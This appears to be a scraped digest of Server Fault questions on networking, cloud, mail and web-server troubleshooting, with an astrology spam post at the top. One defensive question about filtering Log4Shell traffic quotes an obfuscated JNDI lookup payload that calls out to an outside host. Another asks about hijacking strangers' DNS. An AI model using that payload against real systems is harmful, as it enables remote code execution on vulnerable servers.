Monday, December 13, 2021

Recent Questions - Server Fault

Recent Questions - Server Fault


what is best astrologer?

Posted: 13 Dec 2021 02:19 AM PST

Astrology for long is considered as a source of knowledge and wisdom even in realms of the material world. For over the ages, Astrology was considered as a good source of self-knowledge. Astrology was conceived and grew in the times when people thought that celestial bodies have a close link with mankind and what is going on in the terrestrial world. It is a way of philosophy which interconnects everything happening amongst living beings in this material and spiritual world. Contrary to the contemporary belief of biological accident, Astrology believes in the theory of Karma, where there is a purpose for every living being.

The birth chart (or) horoscope is one's individual map showing character and personality and reflecting something bigger in the ever changing wheel of the world. Astrology is an inward art that focuses on the experience that one has in this world.

Existence of switch disturbs network: cable is fine straight to laptop but not through a switch

Posted: 13 Dec 2021 01:58 AM PST

This will be a bit complicated to read, but I hope it will be clear. English is not my first language, sorry.

In our school we have an HP 2530-24G switch connected to an unmanaged tp-link tl-sf1005d switch. We'll call the latter Switch 6. From this switch, the network is expanded through similar unmanaged switches to two directions: each branch goes through classrooms. A PC in a room is connected so that we have a cable coming into the room, going into a tp-link switch which connects the PC and we have another cable which goes out of the switch to connect to the next classroom. So the switches are linked into each other; there's a switch in each classroom.

Now, when I got here I had it working well. Suddenly, there were no network in branch 1. As it turned out, the cable from Switch 6 to the first switch of branch 1 was faulty but I replaced the ethernet connectors and it's now good. When I plug it in to a laptop, it works fine. But, if tehere's a switch between the cable and the laptop, there's no network beyond the switch (because the laptop shows a connection but I cannot ping other devices on the network). I tried 3 different switches, many patch cables, with no luck. I connected two PCs to the switch and they could ping each other.

The interesting thing is, when I connect the PC through a switch, there is a connection for a few seconds. Just enough to load a webpage or ping something, then it goes away. Another mystery is that if a switch is connected, it disturbs the network in Switch 6 and the other branch. Straight or crosslink shouldn't be an issue because the tp-link tl-sf1005d is auto-mdix as far as I know.

If anyone has a clue on what causes this, I'd appreciate if they could share it... Thanks for your time.

Endre

How to tell compromised network users that their network is compromised

Posted: 13 Dec 2021 01:23 AM PST

If I were to use Shodan and discover that someone is using an "admin/admin" creds for their router admin page. How can I tell them that? Is there a way to redirect their DNS queries to a page that says: please change your router password?

How to replace a complete folder with msp?

Posted: 13 Dec 2021 01:14 AM PST

We have an msi in which only one folder need to be changed.is there anyway to generate a patch for this?? Installshield it is showing individual components when I checked

Openstack Glance Image Corrupted

Posted: 13 Dec 2021 01:28 AM PST

I am currently migrating Openstack instance from one nova node to another but the error occurs during the migration:

Image c4ef6b0a-a218-46d3-aea9-4ebc9c13f453 is unacceptable: Image has no associated data

The image is the official ubuntu 20.04 qcow image.

It seems that the glance image is corrupted making it failed to build instance. The instance right now is in ERROR state. Is there any way I can repair the glance image like without changing image ID and bring back my instance?

Let me know if I need to provide further information.

Thanks in advance.

Installing ERPNext on CentOS 7 with Plesk

Posted: 13 Dec 2021 01:00 AM PST

I currently need to have ERPNext installed on a VPS.

My VPS is running on CentOS 7 with Plesk.

My problem is that I am not getting ERPNext installed in any way.

I would like to be able to have a domain: example.com and then another domain erp.example.com where I could access the ERP.

I have tried to follow the following tutorial: Single-bench tutorial but I have not been successful due to the following error:

ERROR: for traefik  Cannot start service traefik: driver failed programming external connectivity on endpoint meigaserp_traefik_1 (048b682bf5e4b99ef588700a382460e2aaede7cd20aff689299598b775d5cfc3): Error starting userland proxy: listen tcp4 0.0.0.0:443: bind: address already in use  

I understand that this error is because Plesk is using port 443 so ERPNext cannot start there.

My question is, how can I maintain Plesk, and have ERPNext on a different port to access via a URL?

I have also tried to do manual installation without docker. but MariaDB is preinstalled on my machine because of plesk and I always get errors on that part, the tutorial was the following: Install ERPNext on CentoOS 7

I am a very inexperienced linux user, and I have been stuck with this problem for several days. Thanks for the help in advance.

PowerDNS & Log4j

Posted: 13 Dec 2021 12:56 AM PST

I'm running a PowerDNS on Linux. It looks like PowerDNS is vulnerable to the new log4j-exploit. Is there any way I can disable the Log4j? From my research it looks like you can change the logging method to syslog, but I'm not quite sure on how to do that.

OpenLDAP/ds-389 Secure Hardening Guide

Posted: 12 Dec 2021 10:41 PM PST

I am in the process of setting up an Open Ldap Server (ds-389) however, I cannot find many good resources which define a security or hardening guide which can be applied to the configuration or schema of the directory.

Does anyone have any good links or references that discuss how we can appropriately harden an Open Ldap server configuration?

I found a few references, and an old CIS bench mark, but it seems CIS no longer provide a bench mark for Open LDAP.

ISC Dhcpv6 addresses

Posted: 12 Dec 2021 10:38 PM PST

I recently set up a dhcpv6 server in my network. The problem is: I set the range of it to

#VLAN120  subnet6 2001:470:2249:120::/64 {          range6 2001:470:2249:120::20 2001:470:2249:120::250;          option dhcp6.name-servers 2606:4700:4700::1111;          range6 2001:470:2249:120:: temporary;  }  

and there is only 1 client in my network that gets the ::250 address. Other clients don't get any addresses at all. What is the problem here?

In addition: I opened the /var/log/syslog file and I noticed, that 2 clients (2 different clients) have the same DUID. After setting one ubuntu client to DHCP only and restarting the adapter it gets the ::250 address. The other client (with the same DUID) gets the ::250 address for about 5 seconds and then it disappears. The client has then no ip address

Network Design For My Application in Oracle Cloud

Posted: 12 Dec 2021 10:21 PM PST

I am trying to design network for my application in cloud. My choice of cloud is oracle cloud here. There will be two VMs in same subnet (one will be master and other as failover), both will be running same web application in docker container. A public IP that can be added to CloudFlare for routing traffic to. I am thinking to install Keepalived for health check and routing traffic to failover server. Keepalived will do a health check using a url and if response is not received from url then start routing the traffic to failover and send email notification to me about the problem.

So far so good theoretically but what I don't know is:

  1. How to route traffic received on public IP to floating IP of keepalived?
  2. Do I need any load balancer?
  3. Do I need HAProxy setup instead of load balancer since I have seen HAProxy being used with Keepalived?

I have tried doing google for this but did not found any good thread that can help.

Use kong reverse proxy to filter log4j exploits

Posted: 12 Dec 2021 10:08 PM PST

I am using a kong reverse proxy to proxy every HTTP request for my web servers. I would like to mitigate the current log4j problem ("log4shell") by finding and replace the critical attacers' strings like "jndi". For example I found this im my logs:

${jndi:${lower:l}${lower:d}a${lower:p}://xxx.log4j.bin${upper:a}xxx.xx:80/callback}

I think this could be accomplished by using the request transformer plugin. Has anyone already done this?

P.S. Just replaceing jndi by disabled is too far-reaching and breaks a lot of things.

How to improve my current HA design

Posted: 12 Dec 2021 11:54 PM PST

I am trying to create high availability application. My current design has two VMs, both have public IPs, both are running in same subnet and both VMs have same web application running in docker. ssl certs and traffic to the app in docker is managed by Traefik. The first VM is master so its ip is updated to Cloudflare. There is a third VM running which has a script which hits the application over IP of first VM to check if it receives response or not. If script does not receives the response from first VM then it send a email notification to notify me of problem and then this script updates the Cloudflare with public ip of second(failover) VM so that traffic goes to second VM.

This design is working all good but it is very rudimentary. I know this can be improved but I am not sure how to make it better so need your suggestions. What I want to do is to run a health check of app on master VM and if it app is not responding for any reason then route the traffic to failover VM. During my research I came across keepalived, I have not looked into it but I think this could be of some help.

enter image description here

Why does Traefik renew with the expired Let's Encrypt certificate path?

Posted: 12 Dec 2021 11:39 PM PST

We run Ubuntu Server 20.04 LTS with a Traefik Docker container. Back in September when the Let's Encrypt DST Root CA X3 certificate expired we didn't really find much actual information on how to remedy this but eventually got it working again by updating Traefik to 2.5 and adding preferredChain: 'ISRG Root X1' to the configuration.

Last week the certificates got renewed and the invalid certificate path is back in. Deleting acme.json and restarting Traefik fixes it again.

There doesn't seem to be any Google results with similar issues recently, so I assume our fix is simply incomplete or incorrect. What is the proper way to get Let's Encrypt working again?

Exchange 2019 Antimalware engine updates download but don't get applied

Posted: 13 Dec 2021 02:05 AM PST

I've been diagnosing for the past day or so some issues with an Exchange 2019 server related to Antimalware filtering/scanning. This was disabled on our server, I enabled it, and restarted the transport service per the Microsoft docs:

In Event Viewer, however, we're getting some logs that indicate this isn't working:

Event 6031, FIPFS: MS Filtering Engine Update process has successfully downloaded updates for Microsoft.    Event 6034, FIPFS: MS Filtering Engine Update process is testing the Microsoft scan engine update    Event 6035, FIPFS: MS Filtering Engine Update process was unsuccessful in testing an engine update.    Engine: Microsoft  

It looks like it fails for some reason and logs "MS Filtering Engine Update process was unsuccessful in testing an engine update."

Then the process repeats and we can see it trying again:

Event 7003, FIPFS: MS Filtering Engine Update process has successfully scheduled all update jobs.    Event 6024, FIPFS: MS Filtering Engine Update process is checking for new engine updates.   Scan Engine: Microsoft    Update Path: http://amupdatedl.microsoft.com/server/amupdate    Event 6030, FIPFS: MS Filtering Engine Update process is attempting to download a scan engine update.   Scan Engine: Microsoft   Update Path: http://amupdatedl.microsoft.com/server/amupdate.    Event 6031, FIPFS: MS Filtering Engine Update process has successfully downloaded updates for Microsoft.    Event 6034, FIPFS: MS Filtering Engine Update process is testing the Microsoft scan engine update    Event 6035, FIPFS: MS Filtering Engine Update process was unsuccessful in testing an engine update.    Engine: Microsoft  

The configuration settings look fine and we've allowed both amupdatedl.microsoft.com and forefrontdl.microsoft.com through the firewall. (It appears that's working because it says downloaded successfully in the Event Viewer logs.) Configuration Settings / Status

Any ideas / help would be much appreciated! Thank you!

Edit: One other note, it does seem to be trying to download and use some of the scan engine updates as evidenced by this staging folder here with recent timestamps. Scan engine temp file downloads

I also found some other resources that suggested a permissions issue, but I checked and Network Service has full permissions to E:\Program Files\Microsoft\Exchange Server\V15\FIP-FS\Data

Things I've looked at:

Questions about Debian OpenDLAP configuration

Posted: 13 Dec 2021 12:47 AM PST

I have the slapd/stable,now 2.4.57+dfsg-3 amd64 Debian 11 package. I read the official OpenLDAP documentation and Debian article.

But I cannot understand the difference between the multiple configuration files.

I know the best practice is to use the dynamic OLC (OpenLDAP Configuration) method over the legacy slapd.conf static file.

I saw the package ships with 2 other static configuration files, they are :

  • /etc/default/slapd (can't find a doc about it)
  • /etc/ldap/ldap.conf (ldap.conf(5) which is a different doc from slapd.conf(5))

My first question is, do I have to use those static files or the OLC method is sufficient ?

Moreover, in /etc/default/slapd file, there is the SLAPD_SERVICES option, and in /etc/ldap/ldap.conf, there is URI option. Both are used to set the connection methods.

What are the differences of these options, and how do they compete ?

Thank you.

Subnet is not creating with terraform on azure, how to fix it?

Posted: 12 Dec 2021 11:33 PM PST

I am trying to create two centos 8 machines with terraform on azure.

My templates github link

When I try to apply, I am getting below error related to policy. Could you please suggest how to fix this?

>     │ Error: creating Subnet: (Name "subnetforAutomation" / Virtual Network Name "vnetforAutomation" / Resource Group "automation_mart"):  > network.SubnetsClient#CreateOrUpdate: Failure sending request:  > StatusCode=0 -- Original Error: Code="RequestDisallowedByPolicy"  > Message="Resource 'subnetforAutomation' was disallowed by policy.  > Policy identifiers:  > '[{\"policyAssignment\":{\"name\":\"Deny-Subnet-Without-Nsg\",\"id\":\"/providers/Microsoft.Management/managementGroups/QSFT-landingzones/providers/Microsoft.Authorization/policyAssignments/Deny-Subnet-Without-Nsg\"},\"policyDefinition\":{\"name\":\"Subnets  > should have a Network Security Group  > \",\"id\":\"/providers/Microsoft.Management/managementGroups/QSFT/providers/Microsoft.Authorization/policyDefinitions/Deny-Subnet-Without-Nsg\"}}]'."  > Target="subnetforAutomation"  > AdditionalInfo=[{"info":{"evaluationDetails":{"evaluatedExpressions":[{"expression":"type","expressionKind":"Field","expressionValue":"Microsoft.Network/virtualNetworks/subnets","operator":"Equals","path":"type","result":"True","targetValue":"Microsoft.Network/virtualNetworks/subnets"},{"expression":"Microsoft.Network/virtualNetworks/subnets/networkSecurityGroup.id","expressionKind":"Field","operator":"Exists","path":"properties.networkSecurityGroup.id","result":"True","targetValue":"false"}]},"policyAssignmentDisplayName":"Deny-Subnet-Without-Nsg","policyAssignmentId":"/providers/Microsoft.Management/managementGroups/QSFT-landingzones/providers/Microsoft.Authorization/policyAssignments/Deny-Subnet-Without-Nsg","policyAssignmentName":"Deny-Subnet-Without-Nsg","policyAssignmentScope":"/providers/Microsoft.Management/managementGroups/QSFT-landingzones","policyDefinitionDisplayName":"Subnets  > should have a Network Security Group  > ","policyDefinitionEffect":"Deny","policyDefinitionId":"/providers/Microsoft.Management/managementGroups/QSFT/providers/Microsoft.Authorization/policyDefinitions/Deny-Subnet-Without-Nsg","policyDefinitionName":"Deny-Subnet-Without-Nsg"},"type":"PolicyViolation"}]  >   >     │  >     │   with azurerm_subnet.subnet,  >     │   on main.tf line 24, in resource "azurerm_subnet" "subnet":  >     │   24: resource "azurerm_subnet" "subnet" {  >     │  

Using a DNS server with ZeroTier

Posted: 13 Dec 2021 12:21 AM PST

I have setup my own Zerotier Controller using ztncui and it works great, but there is one piece of my setup that I cannot seem to get to work and that is having clients use the DNS I configure for the ZeroTier network. The DNS is configured as follows:

{    "domain": "",    "servers": [      "10.10.14.26"    ]  }  

Where 10.10.14.26 is the ZeroTier IP address of the DNS server (just as Linux server running dnsmasq forwarding to the local router). Whenever I test the responses of the DNS server directly on a ZeroTier client, I do get the correct results (e.g. configuring my DNS to use it directly, or specifying the DNS server when using dig), however when selecting "Allow DNS Configuration" on the clients, they still refuse to resolve hostnames that do get resolved when asking the DNS server directly.

I also tried using the local IP address of the DNS server rather than the ZeroTier IP, with the same results (IP forwarding is setup on that same Linux server such that clients can access the local IPs too).

What do I need to do to make sure my ZeroTier clients will use the DNS server I have configured?

My backup plan is to just write various scripts for the different platforms I need to support and have them overwrite and restore the global DNS when connecting and disconnecting to my ZeroTier network respectively, but then what is the use of the "Allow DNS Configuration" option.

I know the DNS feature does not work for Linux clients, but I will be the only Linux client, so this isn't much of a problem for me. The rest of the clients will use either Windows or MacOS, for which this feature is reported to work:

ZeroTier managed DNS is currently only supported on Windows, MacOS, Android, and iOS. Linux support is forthcoming but may be limited to common Linux DNS resolver configurations such as those found in Debian and CentOS/RHEL.

Persistent storage in EKS cluster with multiple availability zones

Posted: 13 Dec 2021 12:06 AM PST

I have an EKS cluster with one linux worker node, which may instantiate in any availability zone within a region. I need to use persistent storage volume so my data won't be lost in case the node dies. It is worth mentioning that I'm talking about RabbitMQ data.

I've tried using an EBS volume, but it has a hard limitation in which it is bound to a single Availability Zone. In case the node dies, and then instantiates to a different AZ, it fails to mount the EBS volume.

So far I have the following ideas:

  1. Have a single EBS volume attached to a worker node. When the worker node restarts in a different Availability Zone, create an EBS snapshot, and use it to create a new EBS volume in the correct Availability Zone. The new node instance will mount the new EBS volume.

  2. Have a worker node for each Availability Zone, with a dedicated EBS volume. RabbitMQ can automatically duplicate the data across the EBS volumes. This eliminates the need for using EBS snapshots, as suggested in solution 1.

  3. Have a single EFS volume which can be attached to multiple nodes across all Availability Zones.

In addition, I came across this post which explains more sophisticated approaches for my issue:

The other option I would recommend for Kubernetes 1.10/1.11 is to control where your volumes are created and where your pods are scheduled:

Can you help me in comparing these approaches? For example, in terms of scalability, cost-efficiency, maintainability... Or perhaps you can think of a better one?

Windows RAS-VPN: cannot reach the entire network

Posted: 13 Dec 2021 02:05 AM PST

We did set up a Windows Server 2019 as a VPN-Server that should grant access to a /22-network.. It has a single Ethernet-connection to the network 192.168.32.0/22 (spanning up to 192.168.35.255). The server's IP is 192.168.33.47 and the RAS-connection has 192.168.33.201.

But when opening the VPN-connection (split-tunneling enabled), I can only reach everything in 192.168.33.0/24. The remainder of the network is not reachable.

What do I need to change on the RAS-Server in order to reach the entire network?

The issue seems to be the routing-table (192.168.110.1 is the remote computer's gateway):

  route print -4    Network destination       Netmask        Interface          Gateway Metric              0.0.0.0       0.0.0.0    192.168.110.1   192.168.110.12     25         192.168.33.0 255.255.255.0   192.168.33.200   192.168.33.208     26  (...)  

Requests to 192.168.32.0/24 are thus routed to the local gateway 192.168.110.1 instead of 192.168.33.200.

The powershell confirms this:

  Find-NetRoute -RemoteIPAddress "192.168.33.5"  (...)  NextHop : 192.168.33.200 (good!)    Find-NetRoute -RemoteIPAddress "192.168.32.5"  (...)  NextHop : 192.168.110.1 (wrong!)  

I can edit the routing-table manually of course:

  route add 192.168.32.0 MASK 255.255.255.0 192.168.33.200 METRIC 26  

The whole target-network is reachable after that. But surely, it cannot be the solution to edit the routing-table on each client.

What do I need to change on the server-side in order to get this to work automatically?

Thank you very much!

Edit: As requested a screenshot of the configuration of the static route that I tried. enter image description here

Apache 2.4 - how to use multiple files in files directive?

Posted: 13 Dec 2021 01:11 AM PST

I can't find any info about it in the official documentation.

I try to allow access to two php files, A.php and B.php.

<Files "A.php">      Require all granted  </Files>    <Files "B.php">      Require all granted  </Files>  

Does it work like this or is there a better solution?

Benefits of using WEF instead of SIEM collectors

Posted: 12 Dec 2021 11:08 PM PST

Aside from the deployment overhead of a log collector agent on servers from which I want to collect events (using GPO, SCCM etc.), are there any added benefits for using Windows Event Forwarding to my SIEM?

Resource calendar with approval sending approval emails with "No response required"

Posted: 13 Dec 2021 01:01 AM PST

[Note: this appeared to be the most applicable Stack site to post this into - apologies if wrong]

Strange situation. I've configured up resource calendar in Office 365 to act as a shared holiday calendar with myself approving and rejecting requests made to the calendar. This works perfectly if an individual generates a calendar request in the resource calendar.

However, if they invite the Room Resource to an existing meeting request / appointment in their own calendar - I receive an email explicitly stating that "this in-policy resource request was forwarded to you for your approval" but the "Accept" and "Reject" buttons are not shown, only the "No Response Required".

My thinking is that the user, by creating the request in their own calendar, has automatically accepted the request. By updating their own request to include the resource, Exchange / Office 365 is not creating a new approve-able request in the resource calendar, which would subsequently create the approval email, but it simply updates their request which cannot be approved from the resource calendar.

I've been through the various settings, but cannot find any solutions?

Thanks in advance.

apache connection was reset while the page was loading on windows 2008 server

Posted: 13 Dec 2021 12:06 AM PST

I'm running a php script in windows 2008 server using xampp server, the script works normaly until I check some pages,it start loading I get this error in firefox :

The connection to the server was reset while the page was loading.

The site could be temporarily unavailable or too busy. Try again in a few moments. If you are unable to load any pages, check your computer's network connection. If your computer or network is protected by a firewall or proxy, make sure that Firefox is permitted to access the Web

.

When I check the php logs I get nothing, in apache logs I always find this after getting the problem:

[Fri Jun 12 11:37:02.076599 2015] [mpm_winnt:notice] [pid 3868:tid 336] AH00428: Parent: child process 3048 exited with status 255 -- Restarting.  [Fri Jun 12 11:37:08.144999 2015] [ssl:warn] [pid 3868:tid 336] AH01909: www.example.com:443:0 server certificate does NOT include an ID which matches the server name  [Fri Jun 12 11:37:08.878199 2015] [mpm_winnt:notice] [pid 3868:tid 336] AH00455: Apache/2.4.12 (Win32) OpenSSL/1.0.1l PHP/5.5.24 configured -- resuming normal operations  [Fri Jun 12 11:37:08.878199 2015] [mpm_winnt:notice] [pid 3868:tid 336] AH00456: Apache Lounge VC11 Server built: Jan 28 2015 16:48:40  [Fri Jun 12 11:37:08.878199 2015] [core:notice] [pid 3868:tid 336] AH00094: Command line: 'C:\\xampp\\apache\\bin\\httpd.exe -d C:/xampp/apache'  [Fri Jun 12 11:37:08.909399 2015] [mpm_winnt:notice] [pid 3868:tid 336] AH00418: Parent: Created child process 3736  [Fri Jun 12 11:37:10.157399 2015] [ssl:warn] [pid 3736:tid 268] AH01909: www.example.com:443:0 server certificate does NOT include an ID which matches the server name  [Fri Jun 12 11:37:10.469399 2015] [ssl:warn] [pid 3736:tid 268] AH01909: www.example.com:443:0 server certificate does NOT include an ID which matches the server name  [Fri Jun 12 11:37:10.609799 2015] [mpm_winnt:notice] [pid 3736:tid 268] AH00354: Child: Starting 150 worker threads.  

I disabled the firewall, I change the port, I increase memory limit, without any result.
I do a backup of the script and I moved it to my laptop running with windows 7, the problem disapear and the script sart working normaly.

So is this problem causes by apache? and how I can fix it?

After many tests, I found that happens only in firefox browser and it's works normaly in google chrome, I cleared all cache and history in firefox but it's not working.I don't know what is the problem exactly but I'm woking now with chrome and I ignored firefox.Any suggestion will be appreciated.

VCenter Adding Host - Error "conflicts with an existing datastore in the datacenter that has the same URL"

Posted: 12 Dec 2021 10:04 PM PST

We have a new Dell VRTX box (2 Blades & Shared Storage). We are getting the above error when trying to add the second host. We've created shared storage(VDISK1) which both ESX hosts have access.

ESX Host1

  • Shared Storage (VDISK1)
  • vCenter Server (Appliance)

ESX Host2

  • Shared Storage (VDISK1)

Searching the net suggested unmounting the storage from the 2nd host prior to adding it to vCenter Server, but that has not worked. Any other suggestions would be appreciated.

Thank You, Eric

** SOLVED **

Just in case anyone else runs into this. We ended up having to re-build the problem host. Once rebuilt, we added it to the Data Center. Then we installed the storage driver and added the shared storage.

openstack installation on ubuntu. Neutron connection issue

Posted: 13 Dec 2021 01:01 AM PST

I try to configure on a single node openstack by following this tutorial: http://docs.openstack.org/juno/install-guide/install/apt/content/neutron-controller-node.html

My installation is done in a Virtual Machine.

My /etc/hosts is:

root@openstack:~/openstack# cat /etc/hosts  127.0.0.1   localhost  127.0.0.1   openstack  127.0.0.1   controller    127.0.0.1   network  127.0.0.1   compute1  

I passed with success all the steps until the neutron installation: http://docs.openstack.org/juno/install-guide/install/apt/content/neutron-controller-node.html

I have a connection issue with neutron:

root@openstack:~/openstack# neutron ext-list  Unable to establish connection to http://controller:9696/v2.0/extensions.json  

When I activate the debug option I have the following trace:

root@openstack:~/openstack# neutron ext-list --debug  DEBUG: keystoneclient.session REQ: curl -i -X GET http://controller:35357/v2.0 -H "Accept: application/json" -H "User-Agent: python-keystoneclient"  DEBUG: keystoneclient.session RESP: [200] {'date': 'Mon, 15 Dec 2014 16:59:05 GMT', 'vary': 'X-Auth-Token', 'content-length': '421', 'content-type': 'application/json', 'x-distribution': 'Ubuntu'}   RESP BODY: {"version": {"status": "stable", "updated": "2014-04-17T00:00:00Z", "media-types": [{"base": "application/json", "type": "application/vnd.openstack.identity-v2.0+json"}, {"base": "application/xml", "type": "application/vnd.openstack.identity-v2.0+xml"}], "id": "v2.0", "links": [{"href": "http://controller:35357/v2.0/", "rel": "self"}, {"href": "http://docs.openstack.org/", "type": "text/html", "rel": "describedby"}]}}    DEBUG: stevedore.extension found extension EntryPoint.parse('table = cliff.formatters.table:TableFormatter')  DEBUG: stevedore.extension found extension EntryPoint.parse('csv = cliff.formatters.commaseparated:CSVLister')  DEBUG: neutronclient.neutron.v2_0.extension.ListExt get_data(Namespace(columns=[], fields=[], formatter='table', max_width=0, quote_mode='nonnumeric', request_format='json', show_details=False))  DEBUG: keystoneclient.auth.identity.v2 Making authentication request to http://controller:35357/v2.0/tokens  DEBUG: keystoneclient.session REQ: curl -i -X GET http://controller:9696/v2.0/extensions.json -H "User-Agent: python-neutronclient" -H "Accept: application/json" -H "X-Auth-Token: ded80764051740a58da4bb80543cd69f"  ERROR: neutronclient.shell Unable to establish connection to http://controller:9696/v2.0/extensions.json  Traceback (most recent call last):    File "/usr/lib/python2.7/dist-packages/neutronclient/shell.py", line 691, in run_subcommand      return run_command(cmd, cmd_parser, sub_argv)    File "/usr/lib/python2.7/dist-packages/neutronclient/shell.py", line 90, in run_command      return cmd.run(known_args)    File "/usr/lib/python2.7/dist-packages/neutronclient/common/command.py", line 29, in run      return super(OpenStackCommand, self).run(parsed_args)    File "/usr/lib/python2.7/dist-packages/cliff/display.py", line 91, in run      column_names, data = self.take_action(parsed_args)    File "/usr/lib/python2.7/dist-packages/neutronclient/common/command.py", line 35, in take_action      return self.get_data(parsed_args)    File "/usr/lib/python2.7/dist-packages/neutronclient/neutron/v2_0/__init__.py", line 669, in get_data      data = self.retrieve_list(parsed_args)    File "/usr/lib/python2.7/dist-packages/neutronclient/neutron/v2_0/__init__.py", line 638, in retrieve_list      data = self.call_server(neutron_client, search_opts, parsed_args)    File "/usr/lib/python2.7/dist-packages/neutronclient/neutron/v2_0/__init__.py", line 610, in call_server      data = obj_lister(**search_opts)    File "/usr/lib/python2.7/dist-packages/neutronclient/v2_0/client.py", line 99, in with_params      ret = self.function(instance, *args, **kwargs)    File "/usr/lib/python2.7/dist-packages/neutronclient/v2_0/client.py", line 301, in list_extensions      return self.get(self.extensions_path, params=_params)    File "/usr/lib/python2.7/dist-packages/neutronclient/v2_0/client.py", line 1321, in get      headers=headers, params=params)    File "/usr/lib/python2.7/dist-packages/neutronclient/v2_0/client.py", line 1298, in retry_request      headers=headers, params=params)    File "/usr/lib/python2.7/dist-packages/neutronclient/v2_0/client.py", line 1241, in do_request      content_type=self.content_type())    File "/usr/lib/python2.7/dist-packages/neutronclient/client.py", line 319, in do_request      return self.request(url, method, **kwargs)    File "/usr/lib/python2.7/dist-packages/neutronclient/client.py", line 63, in request      return self._request(url, method, body=body, headers=headers, **kwargs)    File "/usr/lib/python2.7/dist-packages/neutronclient/client.py", line 314, in _request      **kwargs)    File "/usr/lib/python2.7/dist-packages/keystoneclient/utils.py", line 318, in inner      return func(*args, **kwargs)    File "/usr/lib/python2.7/dist-packages/keystoneclient/session.py", line 324, in request      resp = self._send_request(url, method, redirect, log, **kwargs)    File "/usr/lib/python2.7/dist-packages/keystoneclient/session.py", line 359, in _send_request      raise exceptions.ConnectionRefused(msg)  ConnectionRefused: Unable to establish connection to http://controller:9696/v2.0/extensions.json  Unable to establish connection to http://controller:9696/v2.0/extensions.json  

Do you know what could be the issue?

Nginx URL virtual host rewrite issues with Magento e-commerce

Posted: 12 Dec 2021 11:08 PM PST

I've been running into some problems with my URL rewrites. When I click a link in my Magento back-end it completely messes up the URL.

We start with this link:

http://icanttellmydomain.nl/index.php/paneel/dashboard/index/key/26f665360ac9f2e3e9b5c69b09‌​7fcb6b/

But we are redirected here:

http://icanttellmydomain.nl/index.php/paneel/permissions_user/index/key/index.php/paneel/system_config/index/key/4015c27aea900ad7fceb13e27b76560c/index.php/paneel/dashboard/index/key/26f665360ac9f2e3e9b5c69b097fcb6b/index.php/paneel/dashboard/index/key/26f665360ac9f2e3e9b5c69b097fcb6b/index.php/paneel/dashboard/index/key/26f665360ac9f2e3e9b5c69b097fcb6b/index.php/paneel/dashboard/index/key/26f665360ac9f2e3e9b5c69b097fcb6b/index.php/paneel/dashboard/index...............

It keeps repeating 'index.php' and the URL's path, looping until it gives me a 500 internal error or "The page isn't redirecting properly".

I'm pretty sure it has to do with my vhost configuration. I tried commenting:

 #Forward paths like /js/index.php/x.js to relevant handler   #   location ~ .php/ {   #       rewrite ^(.*.php)/ $1 last;   #   }   

but it didn't do the trick.

My Vhost:

server {        listen   80; ## listen for ipv4; this line is default and implied        listen   [::]:80 default_server ipv6only=on; ## listen for ipv6        listen 443 default ssl;    root /usr/share/nginx/www/xxxxxxxx/public/;  index index.html index.htm;    # Make site accessible from http://<serverip/domain>/  server_name xxx.xxx.xxx.xxx;    error_log  /var/log/nginx/error.log; #warn; #op warn niveau word er logged  #access_log off; #Disabled voor I/O besparing  access_log /var/log/nginx/access.log;    location / {     index index.html index.php;     #autoindex on;    ## If missing pass the URI to Magento's front handler     try_files $uri $uri/ @handler;     expires max; ##   }        ## These locations need to be denied      location ^~ /app/                { deny all; }      location ^~ /includes/           { deny all; }      location ^~ /lib/                { deny all; }      location ^~ /media/downloadable/ { deny all; }      location ^~ /pkginfo/            { deny all; }      location ^~ /report/config.xml   { deny all; }      location ^~ /var/                { deny all; }      ## Disable .htaccess and other hidden files  location  /. {   access_log off;   log_not_found off;   return 404;   deny all;  }    ## Magento uses a common front handler      location @handler {          rewrite / /index.php;      }    #Forward paths like /js/index.php/x.js to relevant handler  #   location ~ .php/ {  #       rewrite ^(.*.php)/ $1 last;  #   }    ##Rewrite for versioned CSS+JS via filemtime(file modification time)  location ~* ^.+\.(css|js)$ {  rewrite ^(.+)\.(\d+)\.(css|js)$ $1.$3 last;  expires 31536000s;  access_log off;  log_not_found off;  add_header Pragma public;  add_header Cache-Control "max-age=31536000, public";  }    ## php-fpm parsing  location ~ \.php.*$ {    ## Catch 404s that try_files miss  if (!-e $request_filename) { rewrite / /index.php last; }    ## Disable cache for php files  expires        off;    ## php-fpm configuration  fastcgi_pass   unix:/var/run/php5-fpm.sock;  fastcgi_param  HTTPS $https if_not_empty;  fastcgi_param  SCRIPT_FILENAME  $document_root$fastcgi_script_name;  include        fastcgi_params;    ## Store code is located at Administration > Configuration > Manage Stores   fastcgi_param  MAGE_RUN_CODE default;  fastcgi_param  MAGE_RUN_TYPE store;    ## Tweak fastcgi buffers, just in case.  fastcgi_buffer_size 128k;  fastcgi_buffers 256 4k;  fastcgi_busy_buffers_size 256k;  fastcgi_temp_file_write_size 256k;  

Thanks for reading! I'm new to all this stuff so take that into consideration in your replies please.

Printing weirdness - German language, Xerox 7125

Posted: 12 Dec 2021 10:36 PM PST

Please read carefully to see the problem details and steps that I have taken to troubleshoot.

We have an executive at my organization who has a German language machine, Windows 7.

I have installed the German Language drivers, and have set the printer to use 'Letter' size paper rather than A4.

  • I am able to print a test page just fine.
  • I am able to create a word or excel document and print it just fine.

When another user emails a document to this fellow and he tries to print it, it seems to try to print in size A4. (through with the PCL6 driver it gives error code 016-749) This despite the printer settings still being on Letter (including the Printing Defaults). Here are some observations:

  • I have quadruple checked the printer settings. It is on Letter.
  • The document is not formatted strangely, or selected on an alternative paper type that I can tell - its generated by an english user, for christ sake!
  • I have tested with PS driver, PCL6 driver, and Xerox's 'Global' driver. None work.
  • I can print the document just fine to a Xerox 7556 down the hall.
  • I am connected to the printer by IP, but have also tried to print to it via a share from a print server. No difference in results.
  • If I copy the contents of the document and paste it into a brand new document, it prints just fine.

I'm really scratching my head here. Printer driver bug?

Can anyone suggest something else to try in order to fix this problem?

error in auth.log but can login; LDAP/PAM

Posted: 12 Dec 2021 10:04 PM PST

I have a server running OpenLDAP. When I start a ssh-session I can log in without problems, but an error appears in the logs. This only happens when I log in with a LDAP account (so not with a system account such as root). Any help to eliminate these errors would be much appreciated.

The relevant piece from /var/log/auth.log

sshd[6235]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=example.com  user=peter  sshd[6235]: Accepted password for peter from 192.168.1.2 port 2441 ssh2  sshd[6235]: pam_unix(sshd:session): session opened for user peter by (uid=0)  

pam common-session

